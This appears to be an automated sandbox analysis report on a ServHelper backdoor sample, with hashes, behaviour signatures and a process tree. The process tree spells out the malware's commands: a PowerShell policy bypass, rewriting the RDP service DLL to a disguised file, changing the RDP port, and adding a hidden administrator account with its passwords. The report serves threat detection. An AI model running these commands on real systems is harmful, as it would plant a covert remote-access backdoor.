Analysis
-
max time kernel
81s -
max time network
84s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
23-05-2022 21:16
General
-
Target
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe
-
Size
3.4MB
-
MD5
c53305cbf3645ab5c84469b892058413
-
SHA1
0a08890c0e5c082ff135fc5df493c346335bdba5
-
SHA256
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c
-
SHA512
b9b35d0f26e456c826623de80c084f3fbd523f9c3cd9e5230150e45508c1a128d1f19a7786b1ebf4008705a7843a36ec0c0c084b870c2258d8238cdb4bb30f88
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 8 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe"C:\Users\Admin\AppData\Local\Temp\7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout -t 153⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps13⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr1⤵
-
C:\Windows\system32\net.exenet start rdpdr1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService1⤵
-
C:\Windows\system32\net.exenet start TermService1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WYZSGDWS$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WYZSGDWS$ /ADD2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 0lHKIJyv1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc 0lHKIJyv1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 0lHKIJyv1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WYZSGDWS$ /ADD1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 0lHKIJyv /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 0lHKIJyv /add1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 0lHKIJyv /add1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0fae5b04f67d12ca621200aac5378dc
SHA1c82c80ff2a2abb57e9a23ac5a100d82c1d551238
SHA256de678dd80006ed864550a034f48a93bf1cb5a31d706d6f25694f577f7867f2a0
SHA51227e1c30a1ad0ab381f037eb4313f11c9c7c3eaa78b5893ba0df04cac006a4169c92d3c6f3b09d181c6862491f8793818d0e9becf355b9aa4a70bef199c536ff8
-
Filesize
589KB
MD5f6b0a3ab9ff83c5ecb8c8d86de9f88ef
SHA1a9ae34c1319eb0a703607cfeaa313d9af576eaf6
SHA25605fc3cfda3ce59f57e74087fdc7892b9f9b2b707ca1e255a85b524cfb8b563c6
SHA512189dd6e6a4b46ee6504b08b3024fbcebcc6ca2811eb244b642f8cb14f47ec5df4aa7b6d9a2ad229d063d22f079ca33ec4a2890f03b639431b1aee4935afc1f2e
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
146KB
MD577a26c23948070dc012bba65e7f390aa
SHA17e112775770f9b3b24e2a238b5f7c66f8802e5d8
SHA2564e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43
SHA5122e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065
-
Filesize
54KB
MD5acc5f33ea59a3aceb71f356e818aa32e
SHA1483682b15fa526f620e525292a26c868fd809769
SHA25656fb4078bce366f84deb9236987465ac616717da91edb409344bdbec5f8969d9
SHA51214676268e9a25ae1fae66b758ac508f1e18ef520af044d8626b6c2be48bdcc5d7983d12fbeb112c06e7b1f24bdc3c6edd57a2aa6c91b40fbe38ea93a0956cd44
-
Filesize
237KB
MD5f97124c949ee386bb6cd3937f275e2ab
SHA1d85a461d0f3547880c38a15b8832adfa30e906d7
SHA256b846a852d9eebe045fb7e353a9203786c18ee485eac42035ebe01ff11cf0ac1a
SHA512957e076384751ee921384645347072fcc3ab1c7c920806125b1ac8ecba7016be186a668c8f38aed064af64cf944a57c07340ee0083892a25f3f90564641516e9
-
-
-
-
-
-
-
Filesize
12KB
-
Filesize
8KB
-
Filesize
124KB
-
-
Filesize
11.4MB
-
-
-
-
-
-
-
-
-
-
-
Filesize
8KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
